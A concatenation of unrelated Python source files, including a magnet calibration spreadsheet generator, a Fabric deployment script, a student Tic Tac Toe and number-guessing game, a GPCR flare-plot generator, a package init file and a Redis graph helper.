else:
code_p2e = fn_quad_reversed.format(x1=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2)
row_p2e = make_row(ename, phy_field, eng_field, True,
code_p2e, params, ydata, xdata, **kws)
return [row_e2p, row_p2e]
# create rows with provided function string
def make_rows_sf(ename, xdata, ydata,
params="x", phy_field="B", eng_field="I",
dtype="BEND", **kws):
x0 = [float(i) for i in xdata.split()]
y0 = [float(i) for i in ydata.split()]
code_e2p, code_p2e = generate_func_string(x0, y0)
row_e2p = make_row(ename, phy_field, eng_field, False,
code_e2p, params, xdata, ydata, **kws)
row_p2e = make_row(ename, phy_field, eng_field, True,
code_p2e, params, ydata, xdata, **kws)
return [row_e2p, row_p2e]
##############################################################################
all_rows = []
# xlwt.Style.colour_map
COLOR_COR = "light_yellow"
COLOR_SOL = "light_turquoise"
COLOR_QUAD = "light_green"
COLOR_SEXT = "light_blue"
COLOR_OCT = "light_orange"
COLOR_BEND = "yellow"
###
k_C1 = 4.682E-05
for e in C1_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C1, xdata=C1_xdata, ydata=C1_ydata, color=COLOR_COR))
k_C2 = 4.232e-4
k_C2_ = -1.970e-4
for e in C2_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C2, xdata=C2_xdata, ydata=C2_ydata, color=COLOR_COR,
k_=k_C2_))
k_C3 = 8.76e-5
for e in C3_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C3, xdata=C3_xdata, ydata=C3_ydata, color=COLOR_COR))
k_C4 = 3.484e-4
for e in C4_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C4, xdata=C4_xdata, ydata=C4_ydata, color=COLOR_COR))
k_C4S4 = 2.598e-4
for e in C4S4_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C4S4, xdata=C4S4_xdata, ydata=C4S4_ydata, color=COLOR_COR))
k_C9Q10 = 0.950e-4
for e in C9Q10_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C9Q10, xdata=C9Q10_xdata, ydata=C9Q10_ydata, color=COLOR_COR))
k_C_S1 = 1.554e-3
for e in C_S1_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C_S1, xdata=C_S1_xdata, ydata=C_S1_ydata, color=COLOR_COR))
k_C_S2 = 2.900e-3
for e in C_S2_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_C_S2, xdata=C_S2_xdata, ydata=C_S2_ydata, color=COLOR_COR))
###
k_S4 = -2.89e-3
for e in S4_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_S4, xdata=S4_xdata, ydata=S4_ydata,
phy_field="B", eng_field="I", dtype="SOL", color=COLOR_SOL))
k_S1 = -7.431e-2
for e in S1_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_S1, xdata=S1_xdata, ydata=S1_ydata,
phy_field="B", eng_field="I", dtype="SOL", color=COLOR_SOL))
k_S2 = -8.115e-2
for e in S2_elements:
all_rows.extend(make_rows_COR_SOL(e, k=k_S2, xdata=S2_xdata, ydata=S2_ydata,
phy_field="B", eng_field="I", dtype="SOL", color=COLOR_SOL))
###
# Q1
x1 = 244.370393236
x1r = None
a1 = 0
b1 = 0.118585750045
c1 = 0
a2 = -16.6039297722
b2 = 0.254477251076
c2 = -0.000278044118257
for e in Q1_elements:
row_e2p, _ = make_rows_QUAD(e, xdata=Q1_xdata, ydata=Q1_ydata,
x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2, color=COLOR_QUAD)
_, row_p2e = make_rows_COR_SOL(e, k=b1, xdata=Q1_ydata, ydata=Q1_xdata, phy_field="B2", eng_field="I",
dtype='QUAD', color=COLOR_QUAD)
all_rows.extend([row_e2p, row_p2e])
for e in Q1_elements_:
row_e2p, _ = make_rows_QUAD(e, xdata=Q1_xdata_, ydata=Q1_ydata_,
x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2,
polarity=-1, color=COLOR_QUAD)
_, row_p2e = make_rows_COR_SOL(e, k=-b1, xdata=Q1_ydata, ydata=Q1_xdata, phy_field="B2", eng_field="I",
dtype='QUAD', color=COLOR_QUAD)
all_rows.extend([row_e2p, row_p2e])
# Q2
k_Q2 = 0.1061
for e in Q2_elements:
all_rows.extend(make_rows_COR_SOL(
e, k=k_Q2, xdata=Q2_xdata, ydata=Q2_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
for e in Q2_elements_:
all_rows.extend(make_rows_COR_SOL(
e, k=-k_Q2, xdata=Q2_xdata_, ydata=Q2_ydata_,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q3
k_Q3 = 0.10373
for e in Q3_elements_:
all_rows.extend(make_rows_COR_SOL(
e, k=-k_Q3, xdata=Q3_xdata, ydata=Q3_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q4
k_Q4 = 8.9697E-02
for e in Q4_elements:
all_rows.extend(make_rows_COR_SOL(
e, k=k_Q4, xdata=Q4_xdata, ydata=Q4_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q5
k_Q5 = 8.6750E-02
for e in Q5_elements_:
all_rows.extend(make_rows_COR_SOL(
e, k=-k_Q5, xdata=Q5_xdata, ydata=Q5_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q6
k_Q6 = 0.0548
for e in Q6_elements:
all_rows.extend(make_rows_COR_SOL(
e, k=k_Q6, xdata=Q6_xdata, ydata=Q6_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
for e in Q6_elements_:
all_rows.extend(make_rows_COR_SOL(
e, k=-k_Q6, xdata=Q6_xdata_, ydata=Q6_ydata_,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# Q8
x1 = 89.6413014892835
x1r = 13.645592213
a1 = 0
b1 = 0.150213016296429
c1 = 0.0000224379963267202
a2 = -5.11759906727964
b2 = 0.264392506827174
c2 = -0.000614430771940742
for e in Q8_elements:
all_rows.extend(make_rows_QUAD(e, xdata=Q8_xdata, ydata=Q8_ydata,
x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2, color=COLOR_QUAD))
# Q9
x1 = 106.83602341739
x1r = -16.2642546626
a1 = 0
b1 = -0.151630162046015
c1 = -0.00000566773110230994
a2 = 7.29509238929589
b2 = -0.288196315595088
c2 = 0.00063347134006815
for e in Q9_elements:
all_rows.extend(make_rows_QUAD(e, xdata=Q9_xdata, ydata=Q9_ydata,
x1=x1, x1r=x1r, a1=a1, b1=b1, c1=c1, a2=a2, b2=b2, c2=c2, color=COLOR_QUAD))
# H3
k_H3 = 5.48
for e in H3_elements_:
all_rows.extend(make_rows_COR_SOL(
e, k=-k_H3, xdata=H3_xdata, ydata=H3_ydata,
phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# H1
k_H1 = 15
for e in H1_elements:
all_rows.extend(make_rows_COR_SOL(
e, k=k_H1, xdata=H1_xdata, ydata=H1_ydata,
phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
for e in H1_elements_:
all_rows.extend(make_rows_COR_SOL(
e, k=-k_H1, xdata=H1_xdata, ydata=H1_ydata,
phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# ARIS
# BEND_FSD1_SCD1
for e in BEND_FSD1_SCD1_elements:
all_rows.extend(make_rows_sf(
e, xdata=BEND_FSD1_SCD1_xdata, ydata=BEND_FSD1_SCD1_ydata,
phy_field="B", eng_field="I", dtype='BEND', color=COLOR_BEND))
# BEND_FSD1_SCD2
for e in BEND_FSD1_SCD2_elements:
all_rows.extend(make_rows_sf(
e, xdata=BEND_FSD1_SCD2_xdata, ydata=BEND_FSD1_SCD2_ydata,
phy_field="B", eng_field="I", dtype='BEND', color=COLOR_BEND))
# QUAD_FSQ1
for e in QUAD_FSQ1_elements:
all_rows.extend(make_rows_sf(
e, xdata=QUAD_FSQ1_xdata, ydata=QUAD_FSQ1_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# QUAD_FSQ2
for e in QUAD_FSQ2_elements:
all_rows.extend(make_rows_sf(
e, xdata=QUAD_FSQ2_xdata, ydata=QUAD_FSQ2_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# QUAD_FSQ5
for e in QUAD_FSQ5_elements:
all_rows.extend(make_rows_sf(
e, xdata=QUAD_FSQ5_xdata, ydata=QUAD_FSQ5_ydata,
phy_field="B2", eng_field="I", dtype='QUAD', color=COLOR_QUAD))
# SEXT_FSQ2
for e in SEXT_FSQ2_elements:
all_rows.extend(make_rows_sf(
e, xdata=SEXT_FSQ2_xdata, ydata=SEXT_FSQ2_ydata,
phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# SEXT_FSQ5
for e in SEXT_FSQ5_elements:
all_rows.extend(make_rows_sf(
e, xdata=SEXT_FSQ5_xdata, ydata=SEXT_FSQ5_ydata,
phy_field="B3", eng_field="I", dtype='SEXT', color=COLOR_SEXT))
# OCT_FSQ2
for e in OCT_FSQ2_elements:
all_rows.extend(make_rows_sf(
e, xdata=OCT_FSQ2_xdata, ydata=OCT_FSQ2_ydata,
phy_field="B4", eng_field="I", dtype='OCT', color=COLOR_OCT))
# OCT_FSQ5
for e in OCT_FSQ5_elements:
all_rows.extend(make_rows_sf(
e, xdata=OCT_FSQ5_xdata, ydata=OCT_FSQ5_ydata,
phy_field="B4", eng_field="I", dtype='OCT', color=COLOR_OCT))
##############################################################################
# write to xls
output_filename = 'unicorn-data-new.xls'
from xlwt import Workbook
from xlwt import XFStyle, easyxf, Pattern, Style
# new workbook
book = Workbook(encoding='utf-8')
# new sheet
sheet1 = book.add_sheet('Functions')
# header
header = ('name', 'ename', 'from_field', 'to_field', 'description', 'args', 'code', 'data_x', 'data_y')
# write header
header_style = easyxf('font: name Arial, bold True, color blue, height 240; borders: bottom thin;')
write_row(sheet1, header, 0, style=header_style)
# write all rows into sheet1
for idx, r in enumerate(all_rows, 1):
row_content, color = r
style, pattern = XFStyle(), Pattern()
pattern.pattern = Pattern.SOLID_PATTERN
pattern.pattern_fore_colour = Style.colour_map[color]
style.pattern = pattern
write_row(sheet1, row_content, idx, style=style)
# save as a file
book.save(output_filename)
| StarcoderdataPython |
6505561 | from fabric.api import *
#
# Configurations
#
master_ip = '172.16.58.3'
slave_ip = '192.168.127.12'
env.user = 'ubuntu'
env.key_filename = '/home/keys/key.pem'
local_ip_list =[]
env.hosts = [master_ip, slave_ip]
@parallel
@with_settings(warn_only=True)
def git_checkout():
sudo('rm -Rf xuser')
run('git clone https://github.com/saltukalakus/xuser')
@parallel
@with_settings(warn_only=True)
def git_pull():
with cd('/home/ubuntu/xuser'):
run('git pull')
@hosts(master_ip)
@with_settings(warn_only=True)
def install_master(secret, aws_id_master, virtual_ip, lmaster_ip, lslave_ip):
with cd('/home/ubuntu/xuser/infra/duo'):
execute = './install_master.sh' + ' ' \
+ secret + ' ' \
+ aws_id_master + ' ' \
+ virtual_ip + ' ' \
+ lmaster_ip + ' ' \
+ lslave_ip
sudo(execute, user="root")
@hosts(slave_ip)
@with_settings(warn_only=True)
def install_slave(secret, aws_id_slave, virtual_ip, lmaster_ip, lslave_ip):
with cd('/home/ubuntu/xuser/infra/duo'):
execute = './install_slave.sh' + ' ' \
+ secret + ' ' \
+ aws_id_slave + ' ' \
+ virtual_ip + ' ' \
+ lmaster_ip + ' ' \
+ lslave_ip
sudo(execute, user="root")
@with_settings(warn_only=True)
def get_local_ip():
global local_ip_list
if len(local_ip_list) == len(env.hosts):
local_ip_list = []
print "Clean local ip list. There is something wrong"
result = run("ifconfig eth0 | grep inet | awk '{print $2}' | cut -d':' -f2")
local_ip_list.append(result)
if len(local_ip_list) == len(env.hosts):
for i in local_ip_list:
print ("%s" % i)
@with_settings(warn_only=True)
@runs_once
def generate_ssl_key():
with lcd('../ssl'):
local('./ssl-key-gen.sh')
@parallel
@with_settings(warn_only=True)
def copy_ssl_key():
put('../ssl/site.pem', '/etc/ssl/private/site.pem', use_sudo=True)
@parallel
@with_settings(warn_only=True)
def reboot_all():
reboot(wait=0)
@parallel
@with_settings(warn_only=True)
def git_install():
sudo('apt-get install -y git', user="root")
@hosts(slave_ip)
@with_settings(warn_only=True)
def aws_configure_slave():
sudo('aws configure', user="root")
@hosts(master_ip)
@with_settings(warn_only=True)
def aws_configure_master():
sudo('aws configure', user="root")
@with_settings(warn_only=True)
@runs_once
def aws_eu_central_1():
local('aws ec2 describe-instances --region eu-central-1')
def find_master_slave_ips():
# TODO: from aws instance description gather below information for a group
# TODO: Update the rest of the functions after this is implemented.
#local_ip_list =[]
#env.hosts = [master_ip, slave_ip]
#master_ip
#slave_ip
#lmaster_ip
#lslave_ip
pass
def install_all():
# TODO: Implement
# Cover script which uses above all to install in a clean first time
pass
| StarcoderdataPython |
1980703 | <filename>Python/Chittle_Ben FSE 2017-2018/Chittle, Ben - FSE.py
# Chittle, Ben - FSE.py
# 21 June 2018
# <NAME>
# This program contains 2 playable games, Tic Tac Toe and Guess the Number,
# which can be chosen, played, and replayed by the user(s).
# For pacing the program.
from time import sleep
# For generating random numbers used in the Tic Tac Toe A.I. and the number in
# the Guess the Number game.
from random import randint
# For retrieving multiple arbitrary values from lists.
from operator import itemgetter as get
# Allows the user to choose a game. It returns a number corresponding to the
# game that should run.
def chooseGame():
sentStart = 0 # Variable determining the start position of a sentence.
while True:
# Asks the player which game to play until a valid value is given.
try:
game = int(input("What game would you like to play?\n(1 - Tic Tac Toe ||"
" 2 - Guess the Number)\n"[sentStart:]))
if game < 1 or game > 2:
raise inputError
except:
sentStart = 34 # Sentence starts at "(1 - Tic Tac Toe...".
continue
return game
# Introduces the player to Tic Tac Toe and acquires the symbol they want to use,
# the number of players, and the 2nd player's symbol (if there are 2 players).
def introTTT_1():
badChars = ['', ' '] # List containing characters not to be chosen.
sentStart = 0 # Variable determining the start position of a sentence.
print ("Welcome to Tic Tac Toe!\n")
sleep(1)
print ("Your goal is to match 3 of your symbols in a row, column, or "
"diagonal while\npreventing your opponent from doing the same.\n")
sleep(1)
while True:
# Asks the user for the number of players until a valid value is given.
try:
players = int(input("Are you playing alone or with a friend? (1 or 2)\n"
[sentStart:]))
if players < 1 or players > 2:
raise inputError
except:
sentStart = 40 # Sentence starts at "(1 or 2)".
continue
if players == 1:
# Player 1 cannot pick the computer's character if playing alone.
badChars.append('O')
badChars.append('o')
sleep(0.5)
# P1 chooses their symbol. It's added to "badChars".
sym1 = input("\nP1: What letter would you like to use? (single character)\n")
while len(sym1) > 1 or sym1 in badChars: #Repeats until valid input.
sym1 = input("P1: Try something else. (single character)\n")
badChars.append(sym1.upper())
badChars.append(sym1.lower())
sleep(0.5)
# P2 chooses their symbol.
if players == 2:
sym2 = input("\nP2: What letter would you like to use? (single character)\n")
while len(sym2) > 1 or sym2 in badChars: #Repeats until valid input.
sym2 = input("P2: Try something else. (single character)\n")
else:
sym2 = 'O'
# Answers are added to a list which is returned.
info = [players, sym1, sym2]
return info
# Draws the board with the appropriate symbols each time it is called using the
# indices list to represent each position.
def createBoard_1():
print (title)
print ("7 |8 |9")
print (" ", board[7], " | ", board[8], " | ", board[9])
print ("_____|_____|_____")
print ("4 |5 |6")
print (" ", board[4], " | ", board[5], " | ", board[6])
print ("_____|_____|_____")
print ("1 |2 |3")
print (" ", board[1], " | ", board[2], " | ", board[3])
print (" | |\n")
# Creates a copy of the list representing the board for the computer to test moves.
def copyBoard_1(Board):
copy = []
for space in Board:
# Loops through each index in the list and appends it to the copy.
copy.append(space)
return copy
# Returns True if the specified space on the board is unoccupied (a blank space).
def isOccupied_1(Board, Move):
return Board[Move] == ' '
# Acquires a player's move.
def getMove_1(Board, Move):
sentStart = 0
nums = [1, 2, 3, 4, 5, 6, 7, 8, 9]
while Move not in nums or isOccupied_1(Board, Move) == False:
# Repeats until valid value given.
try:
Move = int(input(title[:2] + ": " + "Make your move. (1-9)\n"[sentStart:]))
except:
sentStart = 15 # Sentence starts at "(1-9)".
continue
return Move
# Acquires the computer's move.
def computerMove_1(Board, Move, sym1, sym2):
# Contains the values of the corners from the list representing the board.
corners = list(get(1, 3, 7, 9)(Board))
# Contains the values of the middle sides, top, and bottom.
sideTop = list(get(2, 4, 6, 8)(Board))
while True:
# Used for choosing a random value from one of the lists when there is
# more than one option.
ranNum = randint(0, 3)
for space in range(0, 10):
# Determines whether the computer can make the winning move.
copy = copyBoard_1(Board) # Creates a copy of the board.
if copy[space] == ' ':
# Makes each possible move. If it results in a win, it makes the
# move.
copy[space] = sym2
if winner_1(copy, sym2):
return space
for space in range(0, 10):
# Determines whether the player can make the winning move.
copy = copyBoard_1(Board) # Creates a copy of the board.
if copy[space] == ' ':
# Makes each possible move using the player's symbol. If it results
# in a win, it makes the move to block it.
copy[space] = sym1
if winner_1(copy, sym1):
return space
if ' ' in corners:
# If any of the corners are free, it will make a move on an open one.
Move = corners[ranNum] # Tries a random corner.
if Move != ' ': # Retry if occupied.
continue
else:
Move = [1, 3, 7, 9][ranNum] # Choose that space if free.
elif Board[5] == ' ': # Moves in the center if free.
Move = 5
else:
# If the middle top, sides, or bottom are free, it will make a move
# on an open one.
Move = sideTop[ranNum] # Tries a random position from list.
if Move != ' ': # Retry if occupied.
continue
else:
Move = [2, 4, 6, 8][ranNum] # Choose that space if free.
break
return Move
# Determines whether the most recent move should win.
def winner_1(Board, symbol):
# Returns True if any of the following formations contain 3 of the same
# symbols.
# Top row.
return ((Board[7] == symbol and Board[8] == symbol and Board[9] == symbol) or
# Middle row.
(Board[4] == symbol and Board[5] == symbol and Board[6] == symbol) or
# Bottom row.
(Board[1] == symbol and Board[2] == symbol and Board[3] == symbol) or
# Left column.
(Board[7] == symbol and Board[4] == symbol and Board[1] == symbol) or
# Middle column.
(Board[8] == symbol and Board[5] == symbol and Board[2] == symbol) or
# Right column.
(Board[9] == symbol and Board[6] == symbol and Board[3] == symbol) or
# Backward diagonal (top left to bottom right).
(Board[7] == symbol and Board[5] == symbol and Board[3] == symbol) or
# Forward diagonal (bottom left to top right).
(Board[9] == symbol and Board[5] == symbol and Board[1] == symbol))
# Determines whether there is a tie.
def tie_1(Board):
# Returns True if there are no empty spaces left on the board.
return ' ' not in Board[1:9]
# Introduces the user to the Guess the Number game and acquires their name.
def introGuessGame_2():
name = input("What's your name?\n")
sleep(1)
print ("Welcome to Guess the Number!\n")
sleep(1)
print ("Your goal is to guess a random number from 1 to 20 in 6 guesses"
" or less.")
return name
# Acquires the player's guess.
def getGuess_2(guess):
sentStart = 0 # Variable determining the start position of a sentence.
sleep(0.5)
print ("\n\nGuess %i out of 6" %guess) # Prints how many guess the user has.
while True:
# Asks the user to input a number until valid input is given.
try:
pick = int(input("P1: Pick a number from 1 to 20.\n"[sentStart:]))
if pick < 1 or pick > 20:
raise inputError
except:
sentStart = 23 # Sentence starts at "1 to 20".
continue
sleep(0.5)
return pick
# Returns whether the player would like to play again.
def playAgain(subject):
badAns = ('Y', 'y', 'N', 'n')
ans = ''
ans = input("\nWould you like to play %s? (y / n)\n" %subject)
# Asks the user for input until valid input is given.
while ans not in badAns:
ans = input("y / n\n")
return ans
##############################
while True:
subject = "again"
# This variable changes a sentence used in asking the player to play again
# (allows the same sub-process to be used).
game = chooseGame() # The player chooses the game they'd like to play.
gamePlayed = False # Introduction to the game will be able to run.
while game == 1: # Runs if the user chooses Tic Tac Toe.
if not gamePlayed: # Runs the introduction on the first time through.
info = introTTT_1()
players = info[0]
sym1 = info[1]
sym2 = info[2]
# Introduction won't run again until a new game is chosen.
gamePlayed = True
move = 0
board = [" "] * 10 # The board is set up as a series of spaces.
while True:
title = "P1's turn." # The words at the top of the board.
createBoard_1() # The current board is drawn.
move = getMove_1(board, move) # Aquires the player's move.
sleep(0.5)
# The move is made on the board with Player 1's symbol.
board[move] = sym1
if winner_1(board, sym1):
# If there is a winner, the board will be printed with the specified
# title and the loop will break.
title = "\nWINNER PLAYER 1!"
createBoard_1()
break
elif tie_1(board):
# If there is a tie, the board will be printed with the specified
# title printed and the loop will break. There will only ever be a
# tie on Player 1's turn.
title = "\nTIE GAME!"
createBoard_1()
break
if players == 2:
# The program will get Player 2's turn in the same way as Player 1
# if there are 2 players.
title = "P2's turn."
createBoard_1()
move = getMove_1(board, move)
sleep(0.5)
board[move] = sym2
else:
# If there is only 1 player, the program will acquire the computer's
# move similarly to Player 1.
title = "Computer's Turn"
createBoard_1()
# The program will run an algorithm to acquire the computer's
# move.
move = computerMove_1(board, move, sym1, sym2)
sleep(1)
board[move] = sym2
if winner_1(board, sym2):
# If there is a winner, the board will be printed with the specified
# title and the loop will break.
if players == 2:
title = "WINNER PLAYER 2!"
else:
title = "THE COMPUTER WINS!"
createBoard_1()
break
ans = playAgain(subject) # Asks the player if they want to play again.
if ans == 'y' or ans == 'Y':
continue # Restarts at the beginning of the loop.
else:
# Jumps to asking the player if they want to play a different game.
break
while game == 2: # Runs if the player chooses the Number Guessing game.
if not gamePlayed: # Runs the introduction on the first time through.
name = introGuessGame_2()
# Introduction won't run again until a new game is chosen.
gamePlayed = True
lower = 1 # Constant variables are set for randint parameters.
upper = 20
ranNum = randint(lower, upper)
# Generates a random integer within the parameters.
while True:
sleep(1)
for guess in range(1,7): # The player gets 6 chances.
pick = getGuess_2(guess)
if pick == ranNum:
# If the player guesses the number, this runs and breaks the
# loop.
sleep(0.5)
print ("Good job %s, you guessed my number!" %name)
break
elif guess == 6:
# If the player is out of guesses, this runs.
sleep(0.5)
print ("You ran out of guesses!\nMy number was %i.\nBetter"
" luck next time!" %ranNum)
elif pick < ranNum:
# If the player's guess is less than the number, this runs.
print ("\nGo higher.")
else:
# This runs if none of the others are true, meaning the guess is
# higher than the number.
print ("\nGo lower.")
break
ans = playAgain(subject) # Asks the player if they want to play again.
if ans == 'y' or ans == 'Y':
continue # Restarts at the beginning of the loop.
else:
# Jumps to asking the player if they want to play a different game.
break
sleep(0.5)
subject = "a different game"
# Asks the player if they want to play a different game.
ans = playAgain(subject)
if ans == 'y' or ans == 'Y':
# Restarts at the beginning of the loop, allowing the player to choose a
# different game.
continue
else:
break # Ends the program.
print("Thanks for playing!")
| StarcoderdataPython |
6620405 | from dynadb.models import DyndbFiles, DyndbFilesDynamics, DyndbModelComponents, DyndbCompound, DyndbDynamicsComponents,DyndbDynamics, DyndbModel, DyndbProtein,DyndbProteinSequence, DyndbModeledResidues
from view.assign_generic_numbers_from_DB import obtain_gen_numbering
from view.traj2flare_modified_wn import * #[!] Now it's the wn version (new version that uses MDtraj wernet_nilsson function)
from view.views import findGPCRclass, obtain_all_chains, obtain_DyndbProtein_id_list, obtain_seq_pos_info
from dynadb.pipe4_6_0 import *
from view.data import *
import re
import json
from Bio.PDB import *
from Bio import PDB
import itertools
import mdtraj as md
import numpy as np
import copy
import csv
def obtain_fplot_input(result,numbers,chain_name,current_class):
resi_to_group = {}
resi_to_name = {}
cluster_dict={}
#chain_index=str(chain_name_li.index(chain_name))
pos_gnum = numbers[current_class]
for pos in result:
if pos[0] != "-": #Consider only num in the pdb
db_pos=pos[1][1]
pdb_pos=pos[0][1]
#gnum_or_nth=""
this_gnum = pos_gnum[db_pos][1]
this_segm = pos_gnum[db_pos][2]
resi_to_group[(pdb_pos,chain_name)]=str(this_segm)
if this_gnum:#If exist GPCR num for this position
this_gnum=this_gnum[:this_gnum.find(".")]+this_gnum[this_gnum.find("x"):]
cluster_dict[this_gnum]=[chain_name+"."+pdb_pos,""]
resi_to_name[(pdb_pos,chain_name)]=str(this_gnum)
return(resi_to_group,resi_to_name,cluster_dict)
def create_fplot(self,dyn_id,newpath,pdbpath=None,trajpath=None,traj_id=None,stride=1):# Not sure what will happen in pdbs with more than 1 gpcr . Use traj 14 or 15 for dyn 1
"""Generates the json files necessary to visualize flare plots."""
gpcr_mode=True
if (trajpath==None and traj_id):
trajpath=DyndbFiles.objects.get(id=traj_id)
if (pdbpath==None):
pdbpath=DyndbFiles.objects.filter(dyndbfilesdynamics__id_dynamics=dyn_id, id_file_types__extension="pdb")[0].filepath
chain_name_li=obtain_all_chains(pdbpath)
if (len(chain_name_li)==0):
error="Protein chains not found."
self.stdout.write(self.style.NOTICE(error))
return
prot_li_gpcr, dprot_li_all,dprot_li_all_info,pdbid=obtain_DyndbProtein_id_list(dyn_id)
dprot_chains={}
chains_taken=set()
prot_seq_pos={}
seq_pos_n=1
for prot_id, prot_name, prot_is_gpcr, prot_seq in dprot_li_all_info: #To classify chains by protein (dprot_chains is a dict:for each protein, has a list of each chain with its matchpdbfa results + the protein seq_pos)
seq_pos=[]
dprot_chains[prot_id]=[[],[]]
for chain_name in chain_name_li:
checkpdb_res=checkpdb_ngl(pdbpath, segid="",start=-1,stop=9999999999999999999, chain=chain_name)
if isinstance(checkpdb_res, tuple):
tablepdb,pdb_sequence,hexflag=checkpdb_res
result=matchpdbfa_ngl(prot_seq,pdb_sequence, tablepdb, hexflag)
type(result)
if isinstance(result, list):
#chain_results[chain_name]=result
if chain_name not in chains_taken:
chains_taken.add(chain_name)
dprot_chains[prot_id][0].append((chain_name,result))
(seq_pos,seq_pos_n)=obtain_seq_pos_info(result,seq_pos,seq_pos_n,chain_name,True)
dprot_chains[prot_id][1]=seq_pos
prot_seq_pos[prot_id]=(prot_name,seq_pos)
keys_to_rm=set()
for key, val in dprot_chains.items():
if val==([],[]):
keys_to_rm.add(key)
for key in keys_to_rm:
del dprot_chains[key]
if chains_taken: # To check if some result have been obtained
for gpcr_DprotGprot in prot_li_gpcr:
gpcr_Dprot=gpcr_DprotGprot[0]
gpcr_Gprot=gpcr_DprotGprot[1]
dprot_id=gpcr_Dprot.id
dprot_name=gpcr_Dprot.name
gen_num_res=obtain_gen_numbering(dyn_id, gpcr_Dprot,gpcr_Gprot)
if len(gen_num_res) > 2:
(numbers, num_scheme, db_seq, current_class) = gen_num_res
current_class=findGPCRclass(num_scheme)
gpcr_n_ex=""
for pos_gnum in numbers[current_class].values():
if pos_gnum[1]: #We take the 1st instance of gpcr num as example, and check in which format it is (n.nnxnn or nxnn)
gpcr_n_ex=pos_gnum[1]
break
if not "." in gpcr_n_ex: #For the moment we only accept n.nnxnn format
error="Error obtaining GPCR generic numbering."
self.stdout.write(self.style.NOTICE(error))
return
(dprot_chain_li, dprot_seq) = dprot_chains[dprot_id]
for chain_name, result in dprot_chain_li:
(resi_to_group,resi_to_name,cluster_dict)=obtain_fplot_input(result,numbers,chain_name,current_class)
model_res=DyndbModeledResidues.objects.filter(id_model__dyndbdynamics__id=dyn_id)
seg_to_chain={mr.segid : mr.chain for mr in model_res}
if gpcr_mode:
for (pos, gnum) in resi_to_name.items():
if gnum != "None":
chain=gnum.split("x",1)[0]
resi_to_name[pos]=chain+"."+gnum
create_json(self,True,trajpath,pdbpath,resi_to_group,resi_to_name,newpath,stride,seg_to_chain)
else:
create_json(self,False,trajpath,pdbpath,resi_to_group,resi_to_name,newpath,stride,seg_to_chain)
out_file = re.search("(\w*)(\.\w*)$" , newpath).group()
self.stdout.write(self.style.SUCCESS('JSON file '+out_file+' successfully created'))
else:
error="Error obtaining GPCR generic numbering."
self.stdout.write(self.style.NOTICE(error))
return
else:
error="Error assigning the GPCR generic numbering to the PDB"
self.stdout.write(self.style.NOTICE(error))
return
| StarcoderdataPython |
11315990 | from flask import abort as abort
from flask import flash as flash
from flask import redirect as redirect
from flask import url_for as url_for
from .app import Djask as Djask
from .blueprints import APIBlueprint as APIBlueprint
from .blueprints import Blueprint as Blueprint
from .globals import current_app as current_app
from .globals import g as g
from .globals import request as request
from .globals import session as session
__version__ = "0.5.0"
__all__ = [
"abort",
"flash",
"redirect",
"url_for",
"Djask",
"Blueprint",
"APIBlueprint",
"current_app",
"request",
"g",
"session",
]
| StarcoderdataPython |
3412103 | # file: redis_graph_common.py
# the purpose of this file is to implement common graph functions
import redis
import copy
class Redis_Graph_Common:
#tested
def __init__( self, redis, separator = chr(130), relationship_sep=chr(131), label_sep=chr(132), header_end=chr(133) ):
self.redis = redis
self.sep = separator
self.rel_sep = relationship_sep
self.label_sep = label_sep
self.header_end = header_end
def make_string_key( self, relationship,label,name):
return relationship+self.rel_sep+label+self.label_sep+name+self.header_end
def reverse_string_key( self, string_key ):
temp_1 = string_key.split(self.rel_sep)
relationship = temp_1[0]
temp_2 = temp_1[1].split(self.label_sep)
label = temp_2[0]
name = temp_2[1][:-1]
return relationship,label,name
def _convert_namespace( self, namespace):
temp_value = []
for i in namespace:
temp_value.append(self.make_string_key( i[0],i[1],i[2] ))
key_string = self.sep+self.sep.join(temp_value)
return key_string
def construct_node( self, namespace, relationship,label,name ): #tested
new_name_space = copy.copy(namespace)
new_name_space.append( [ relationship,label,name ] )
redis_string = self._convert_namespace( new_name_space )
self.redis.hset(redis_string,"name",name)
self.redis.hset(redis_string,"namespace",self._convert_namespace(new_name_space))
return redis_string, new_name_space
def match( self, relationship, label, name , starting_path=None):
match_string =self._convert_namespace([[relationship,label,name]])
if starting_path != None:
start_string = starting_path
else:
start_string = ""
match_key = start_string+"*"+match_string
return self.redis.keys( match_key )
def delete_all(self): #tested
keys = self.redis.keys(self.sep+"*")
for i in keys:
self.redis.delete(i)
if __name__ == "__main__":
# test driver
redis = redis.StrictRedis( host = "127.0.0.1", port=6379, db = 11 )
common = Redis_Graph_Common( redis)
redis_key, new_namespace =common.construct_node( [], "","head","head" )
print redis_key,new_namespace
print redis.hgetall(redis_key)
